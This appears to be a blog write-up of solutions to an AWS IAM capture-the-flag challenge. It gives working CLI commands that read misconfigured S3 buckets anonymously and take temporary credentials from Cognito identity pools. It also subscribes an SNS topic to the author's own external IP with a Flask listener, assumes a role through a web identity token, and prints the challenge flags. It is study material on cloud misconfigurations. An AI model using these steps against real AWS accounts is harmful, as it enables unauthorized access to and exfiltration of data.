bigiamchallenge AWS IAM Challenges

n00🔑
7 min readJun 27, 2023

Welcome to my blog! In this post, I’ll be sharing my solutions to the challenges presented by bigiamchallenge.com. The Big IAM Challenge is an online CTF (Capture the Flag) event that tests participants’ knowledge of AWS IAM (Identity and Access Management). The challenge consists of six objectives that highlight common IAM misconfigurations. I had a great time working through the challenges and learned a lot along the way. So, let’s dive in and explore my solutions!

Challenge 1

The first challenge in The Big IAM Challenge involves an S3 bucket with an IAM policy that allows public access to the objects in the bucket. The policy allows anyone to perform the s3:GetObject action on objects in the thebigiamchallenge-storage-9979f4b bucket, as well as the s3:ListBucket action on the bucket itself, with the condition that the s3:prefix is "files/*".

To solve this challenge, you can use the AWS CLI (Command Line Interface) to list the contents of the files/ directory in the bucket and retrieve the flag1.txt file. The solution commands are:

aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/ --no-sign-request
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt /tmp/ --no-sign-request

The first command lists the contents of the files/ directory in the bucket, while the second command copies the flag1.txt file from the bucket to the /tmp/ directory on your local machine. The --no-sign-request flag is used to specify that the request should be made anonymously, without signing it with AWS credentials.

Challenge 2

The second challenge in The Big IAM Challenge involves an SQS (Simple Queue Service) queue with an IAM policy that allows public access to send and receive messages. The policy allows anyone to perform the sqs:SendMessage and sqs:ReceiveMessage actions on the wiz-tbic-analytics-sqs-queue-ca7a1b2 queue.

To solve this challenge, you can use the AWS CLI (Command Line Interface) to obtain temporary credentials from Amazon Cognito, and then use those credentials to send a message to the queue and receive the message from the queue. Here are the solution commands:

aws cognito-identity get-id --identity-pool-id "us-east-1:c6f3eb2e-3cb5-404e-93bc-f0bdf7ad042e"
aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:9ea8f9af-f687-439b-951d-0e83653f6be7"
aws sts get-caller-identity --profile challenge2
aws sqs send-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 --message-body "Hello, World" --profile challenge2 --region us-east-1
aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 --profile challenge2 --region us-east-1
  1. The first command retrieves an identity ID from Amazon Cognito using the specified identity pool ID. The identity pool ID can be found in the JavaScript in the HTML source of the review challenge 2 URL (view-source:https://bigiamchallenge.com/challenge/2).

Understanding and converting this javascript code to AWS CLI commands using chatgpt AI.

2. The second command retrieves temporary AWS credentials for the specified identity ID. These credentials can then be used to authenticate subsequent AWS CLI commands.

3. The third command uses the sts get-caller-identity command to verify that the temporary credentials obtained from Amazon Cognito are valid.

4. The fourth command sends a message with the body "Hello, World" to the SQS queue, while the fifth command receives a message from the queue. The --profile challenge2 and --region us-east-1 flags are used to specify the profile and region to use for these commands.

5. In response to the fifth command we got a link to the HTML page.

Challenge 3 - Enable Push Notifications

“We got a message for you. Can you get it?”

aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol http --notification-endpoint "http://13.233.110.127/@tbic.wiz.io"  --profile challenge2 --region us-east-1

Created a simple Flask application for accepting this POST request and showing data with the help of chatgpt:)

from flask import Flask, request

app = Flask(__name__)
app.debug = True # Enable debug mode

@app.route('/@tbic.wiz.io', methods=['GET', 'POST'])
def handle_request():
if request.method == 'GET':
# Handle GET request
app.logger.debug('Received GET request')
return 'OK'
elif request.method == 'POST':
# Handle POST request
data = request.get_data(as_text=True) # retrieve the request data as raw text
app.logger.info('Received POST data: %s', data)
return 'OK' # respond with a simple 'OK' message

if __name__ == '__main__':
app.run(host='0.0.0.0', port=80, debug=True) # Run the app in debug mode
{
"Type" : "SubscriptionConfirmation",
"MessageId" : "f51a9501-791c-4f17-a484-50cf9687fec1",
"Token" : "2336412f37fb687f5d51e6e2425c464de3d3f2d7cc95985769c84f3b85b66695203969aa36901469e57fd8c9cae21db297264bb9219a2cb6c0e4ba804ac11b86311053462f59304343b33f625cb8bf3b8d64f3be6c8d52dbf4361f65fad077345c91867b5aa35ab0bcc7e68f10359217979e446f0f9ca0e2f3413cb2d57b815b",
"TopicArn" : "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
"Message" : "You have chosen to subscribe to the topic arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications.\nTo confirm the subscription, visit the SubscribeURL included in this message.",
"SubscribeURL" : "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425c464de3d3f2d7cc95985769c84f3b85b66695203969aa36901469e57fd8c9cae21db297264bb9219a2cb6c0e4ba804ac11b86311053462f59304343b33f625cb8bf3b8d64f3be6c8d52dbf4361f65fad077345c91867b5aa35ab0bcc7e68f10359217979e446f0f9ca0e2f3413cb2d57b815b",
"Timestamp" : "2023-06-26T08:06:38.905Z",
"SignatureVersion" : "1",
"Signature" : "HGbm1kv5Wbrt5u/nmgUZr3GjpLE2qfSrBVfZfOpc1bCuFJvbL9lQyaw9rpjxcBZb95jJ7eYB2bwNzYcWoZj+AsJAHzwhF+G+2QNoHQRNjhSEvpFv++asWNPQ8UlAq97avDKFS1L8AbB8s6oG928p3WLBX/WRPrrzqSTjw+xErrWARyAuarwSeX2nYjN0b43T/0N8pAHf1xa2O70HBaz/1aSnPWVmRUvTms7SNJWzoljIVVpo6PieHP6C7jfnTMUCvymo0AJFyqScCMfmC80AQgGPqcVcI9g7pV359jy34TNcm3k+OslkZbPXFV+hX8/XPtjb17L1kjAwiqKLLu6FPg==",
"SigningCertURL" : "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-01d088a6f77103d0fe307c0069e40ed6.pem"
}

We need to open the “SubscribeURL” that we got in the previous request to our server.

{wiz:always-suspect-asterisks}

Challenge 4

“”

Same as challenge 1.

aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt /tmp/ --no-sign-request
cat /tmp/flag-as-admin.txt
{wiz:principal-arn-is-not-what-you-think}

Challenge 5

“We configured AWS Cognito as our main identity provider. Let’s hope we didn’t make any mistakes.”

aws cognito-identity get-id --identity-pool-id "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:b293decf-cc8b-4082-96eb-70ba01c98d1e"
{wiz:incognito-is-always-suspicious}

Challenge 6

“One final push

Anonymous access no more. Let’s see what can you do now.

Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "cognito-identity.amazonaws.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
}
}
]
}
aws cognito-identity get-id --identity-pool-id "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
aws cognito-identity get-open-id-token --identity-id "us-east-1:5e3eaf20-3565-4894-bbf7-6a1836f7c27d"
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name my-session --web-identity-token
aws sts get-caller-identity --profile challenge6
aws s3 ls s3://wiz-privatefiles-x1000 --profile challenge6
aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt --profile challenge6 -

The OpenID token you obtained from the aws cognito-identity get-open-id-token command can be used to authenticate with other AWS services that support OpenID Connect (OIDC) identity tokens. To use this token, you typically include it as a bearer token in the Authorization header of an HTTP request to an AWS service.

In our case, it appears that you have an IAM role with the ARN arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role that is associated with your Cognito identity. You can use the aws sts assume-role-with-web-identity command to assume this role and obtain temporary security credentials that you can use to access AWS services. Here’s an example:

aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name my-session --web-identity-token OPENID_TOKEN

Replace OPENID_TOKEN with the OpenID token, you obtained from the GetOpenIdToken operation. This command returns temporary security credentials that you can use to access AWS services.

Once you have obtained the temporary security credentials, you can use them to make authenticated requests to AWS services by setting the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN environment variables or by using a named profile with the --profile option.

Thanks for reading!!

--

--